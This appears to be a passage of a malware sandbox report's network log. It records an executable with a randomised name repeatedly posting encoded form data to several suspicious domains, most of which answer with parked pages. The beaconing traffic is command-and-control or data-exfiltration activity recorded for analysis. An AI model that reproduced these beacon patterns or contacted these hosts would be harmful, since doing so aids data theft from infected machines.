                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==
                                                                                set-cookie: parking_session=eac73d05-3aa8-4162-96ef-07d6ea191195; expires=Tue, 03 Dec 2024 13:38:49 GMT; path=/
                                                                                connection: close
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Dec 3, 2024 14:23:49.565705061 CET | 607 | IN
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZWFjNzNkMDUtM2FhOC00MTYyLTk2ZWYtMDdkNmVhMTkxMTk1IiwicGFnZV90aW1lIjoxNzMzMjMyMj


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                31 | 192.168.2.5 | 50014 | 199.59.243.227 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:23:51.272123098 CET | 1844 | OUT | POST /tskk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.dating-apps-az-dn5.xyz
                                                                                Origin: http://www.dating-apps-az-dn5.xyz
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.dating-apps-az-dn5.xyz/tskk/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:23:52.235152006 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                date: Tue, 03 Dec 2024 13:23:51 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1154
                                                                                x-request-id: c6d18bba-3c6a-414b-aef1-c67fed49a12a
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==
                                                                                set-cookie: parking_session=c6d18bba-3c6a-414b-aef1-c67fed49a12a; expires=Tue, 03 Dec 2024 13:38:52 GMT; path=/
                                                                                connection: close
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Dec 3, 2024 14:23:52.235292912 CET | 607 | IN |
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzZkMThiYmEtM2M2YS00MTRiLWFlZjEtYzY3ZmVkNDlhMTJhIiwicGFnZV90aW1lIjoxNzMzMjMyMj


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                32 | 192.168.2.5 | 50015 | 199.59.243.227 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:23:54.002166033 CET | 534 | OUT | GET /tskk/?fh=o5GB+IawIAU5T0thXdQTAhCz8F67YQPQT/nwZCkciWz+LkCAD5WzKPOp+WFYKDZnS0ikteADWtOd2j97JYt8nhoktnI+jDBp8l2kGV3Ckdt2Sxo97xdpdVJjZoS3MkxEfg==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.dating-apps-az-dn5.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:23:55.178323984 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                date: Tue, 03 Dec 2024 13:23:54 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1522
                                                                                x-request-id: 2cd67dc8-0ae0-4bc6-bf81-69085079ef5b
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u42grjlDShJAke290VbY+AfW+icf8oNle2PmlZ7onfwMW8K2rVbzx7kITYN9/9f0BX82dPKrotKLI1+NRqLDMQ==
                                                                                set-cookie: parking_session=2cd67dc8-0ae0-4bc6-bf81-69085079ef5b; expires=Tue, 03 Dec 2024 13:38:55 GMT; path=/
                                                                                connection: close
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u42grjlDShJAke290VbY+AfW+icf8oNle2PmlZ7onfwMW8K2rVbzx7kITYN9/9f0BX82dPKrotKLI1+NRqLDMQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Dec 3, 2024 14:23:55.178422928 CET | 975 | IN |
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmNkNjdkYzgtMGFlMC00YmM2LWJmODEtNjkwODUwNzllZjViIiwicGFnZV90aW1lIjoxNzMzMjMyMj


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                33 | 192.168.2.5 | 50016 | 199.59.243.227 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:24:01.029881954 CET | 783 | OUT | POST /27s6/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.whisperart.net
                                                                                Origin: http://www.whisperart.net
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.whisperart.net/27s6/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=6FnJpi9V/PzcM0DoqlBA1oJRPr+HJ+QIdwmTcxfJ5yaMZnJzvkR9xEuZkz88boRB9FMT5dfTYcLKTyteqXWOv4zDkphIRtBo7oW8txSPi+LvHqrLV56cztEu53L1MWMeZEeWrZtrHuS1vgPnVrE3FPZUdT9C6cXTlgGqOz4y+r3AvUlvJHA7IdUJj7mywlqcQyQQ0dQ=
                                                                                Dec 3, 2024 14:24:02.157486916 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                date: Tue, 03 Dec 2024 13:24:01 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1122
                                                                                x-request-id: 613d471a-d10a-4ac2-9e0f-a2e6b2d52afe
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==
                                                                                set-cookie: parking_session=613d471a-d10a-4ac2-9e0f-a2e6b2d52afe; expires=Tue, 03 Dec 2024 13:39:01 GMT; path=/
                                                                                connection: close
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Dec 3, 2024 14:24:02.157521963 CET | 575 | IN |
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjEzZDQ3MWEtZDEwYS00YWMyLTllMGYtYTJlNmIyZDUyYWZlIiwicGFnZV90aW1lIjoxNzMzMjMyMj


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                34 | 192.168.2.5 | 50017 | 199.59.243.227 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:24:03.721452951 CET | 803 | OUT | POST /27s6/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.whisperart.net
                                                                                Origin: http://www.whisperart.net
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.whisperart.net/27s6/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=6FnJpi9V/PzcdlToxEBAyIJSAL+HCeRDdwqTcwaC5h+MAC1zulR92EuZrT85VIQD9Fwb5YnTYf3KT2peqEOJuoyl/5hKcNBo7oW8tyvgi+TvHeXLWY6boNEto3L1dmMaZEfzrc0+HoW1vh/nV584PPZaZT8mpZmFrQ6QFxJ6iLjdqiUFTlITb94xzouFhVL1KRAgqKHL8OJXGPK0z3YMUODYooh7
                                                                                Dec 3, 2024 14:24:04.932269096 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                date: Tue, 03 Dec 2024 13:24:04 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1122
                                                                                x-request-id: 6d1e2114-38c0-4e82-98a2-8c8b5335f86d
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==
                                                                                set-cookie: parking_session=6d1e2114-38c0-4e82-98a2-8c8b5335f86d; expires=Tue, 03 Dec 2024 13:39:04 GMT; path=/
                                                                                connection: close
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Dec 3, 2024 14:24:04.932296038 CET | 575 | IN |
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmQxZTIxMTQtMzhjMC00ZTgyLTk4YTItOGM4YjUzMzVmODZkIiwicGFnZV90aW1lIjoxNzMzMjMyMj


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                35 | 192.168.2.5 | 50018 | 199.59.243.227 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:24:06.389826059 CET | 1820 | OUT | POST /27s6/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.whisperart.net
                                                                                Origin: http://www.whisperart.net
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.whisperart.net/27s6/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh= [TRUNCATED]
                                                                                Dec 3, 2024 14:24:07.523653984 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                date: Tue, 03 Dec 2024 13:24:06 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1122
                                                                                x-request-id: 46f11d6c-030e-4a82-b155-dc315b2430e2
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==
                                                                                set-cookie: parking_session=46f11d6c-030e-4a82-b155-dc315b2430e2; expires=Tue, 03 Dec 2024 13:39:07 GMT; path=/
                                                                                connection: close
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XXp6qAtzgFrrIyjeXUkCtPqzYHoLPwVja6ZiVVYK2s4VTThMsEXjltxbtnWgpVQUbnLKHJC+TAFovXSuqaACMA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Dec 3, 2024 14:24:07.523698092 CET | 575 | IN |
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDZmMTFkNmMtMDMwZS00YTgyLWIxNTUtZGMzMTViMjQzMGUyIiwicGFnZV90aW1lIjoxNzMzMjMyMj


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                36 | 192.168.2.5 | 50019 | 199.59.243.227 | 80 | 1536 | C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 3, 2024 14:24:09.053472996 CET | 526 | OUT | GET /27s6/?jnGlY=dHeXwH1PkJZDr&fh=3HPpqXJ7+KzZdUbztAJQoIdlDoC5J9hYXz+VcheInCeAf0Mmt05i/k62iF4aOsJa+VYW+vyKTPXBSx5msm7TgI/vrMgSa7d6ydGcyUbb1sGAEKWqA4+Ev4Y2u0PwcF1BFA== HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.whisperart.net
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:24:10.186819077 CET  1236  IN  HTTP/1.1 200 OK
                                                                                date: Tue, 03 Dec 2024 13:24:09 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1502
                                                                                x-request-id: dc2796b4-e608-465f-ad20-ee7a96647953
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cfIEHnUSANXOUEed+RaZ6iD5sbemfVtRL5MNemqWfgtTuwncFnZengjAkT5Gvoga3JJ7s2HyTGAQr0wNX1MDgg==
                                                                                set-cookie: parking_session=dc2796b4-e608-465f-ad20-ee7a96647953; expires=Tue, 03 Dec 2024 13:39:10 GMT; path=/
                                                                                connection: close
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cfIEHnUSANXOUEed+RaZ6iD5sbemfVtRL5MNemqWfgtTuwncFnZengjAkT5Gvoga3JJ7s2HyTGAQr0wNX1MDgg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Dec 3, 2024 14:24:10.186953068 CET  955  IN
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGMyNzk2YjQtZTYwOC00NjVmLWFkMjAtZWU3YTk2NjQ3OTUzIiwicGFnZV90aW1lIjoxNzMzMjMyMj


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                37  192.168.2.5  50020  172.67.156.195  80  1536  C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Dec 3, 2024 14:24:15.798885107 CET  792  OUT  POST /ez1t/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.ana-silverco.shop
                                                                                Origin: http://www.ana-silverco.shop
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.ana-silverco.shop/ez1t/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=3ds4vL+R3/6ZWyR8zhd/MYqOzJ9L3h7vC7O5gO975StXcTYL+peOT7PAPy31Lsx1XytiCKBM5aw45LpzPcT8HyxlS/fSXyApzHjgNQkGWq9LWdEZcb39N4p3Ec9ixEDViLo/MuW86JBpV65/C91bhjcUrSRMliDjTYDe78CqpjLuLPKyAkDJhgAo9pU8lneOtPav2U0=
                                                                                Dec 3, 2024 14:24:16.928003073 CET  908  IN  HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:24:16 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Powered-By: PHP/7.4.33
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2Be1uRK20CLkmmMKiytTNa0XbxDuiJ1hewl2q0kmc9ZEfYgSVMOgrdDOMAn5uZP2pEF1StGsa%2FEao2bRiIUbEKRRTj1jWQsFIDQvwsWe%2FDv%2B%2FIRsqZIyys%2Fq1Ip2PsA7%2B65DPq1pspQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3e0446b27c445-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1493&min_rtt=1493&rtt_var=746&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=792&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                38  192.168.2.5  50021  172.67.156.195  80  1536  C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Dec 3, 2024 14:24:18.484328985 CET  812  OUT  POST /ez1t/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.ana-silverco.shop
                                                                                Origin: http://www.ana-silverco.shop
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.ana-silverco.shop/ez1t/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=3ds4vL+R3/6ZZzh8gWx/K4qN/p9L9B6HC7S5gKtV5kVXf28L/qGOU7PAHS29GMx6XygdCKNM5a045OFzPv6OGixjbffQYSApzHjgNQY4WpNLRtUZd/j+AYp0Ts9i6kDRiLodMqfZ6L5pV6J/CpZE4TcSlyQ92xGsSOLjmfev9FDSDZ7YaGLhyAsQt6cL0X/n3sKfoDiGK8dGWuFzM1BuLwmzZUVf
                                                                                Dec 3, 2024 14:24:19.663686037 CET  902  IN  HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:24:19 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Powered-By: PHP/7.4.33
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YmBwVoSQC171dnm6cY8gPxeQFzpNtkhvQJL%2FKbLB4CHkLi7Vtg0ohNOtOy79yj2PUh8J1fFw9VgH8RqM7QUnWz8Fu%2BGf6shnfqTEksWJan%2FzV%2BcgJsEi1duR6Aym76MhmKyDvXVxRlk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3e05578385e6a-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1688&rtt_var=844&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=812&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                39  192.168.2.5  50022  172.67.156.195  80  1536  C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Dec 3, 2024 14:24:21.154304981 CET  1829  OUT  POST /ez1t/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.ana-silverco.shop
                                                                                Origin: http://www.ana-silverco.shop
                                                                                Content-Type: application/x-www-form-urlencoded
